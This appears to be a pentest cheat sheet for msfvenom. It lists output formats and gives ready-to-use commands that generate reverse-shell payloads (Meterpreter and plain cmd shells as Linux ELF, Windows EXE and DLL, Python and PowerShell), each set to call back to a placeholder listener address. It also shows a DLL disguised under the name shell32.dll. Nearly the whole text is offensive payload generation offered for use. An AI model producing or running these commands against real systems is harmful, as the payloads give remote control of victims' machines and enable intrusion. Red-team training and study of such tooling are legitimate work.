Msfvenom Executable formats 1asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats 1bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript Staged Meterpreter 1msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf Inline Meterpreter 1msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf Executable with Meterpreter 1msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe Executable with Windows cmd 1msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe Windows DLL with Windows cmd 1msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll Execute Windows Command - génère une dll shell32.dll qui lance calc.exe 1msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll Python 1msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw Powershell 1msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw List encoders 1msfvenom -l encoders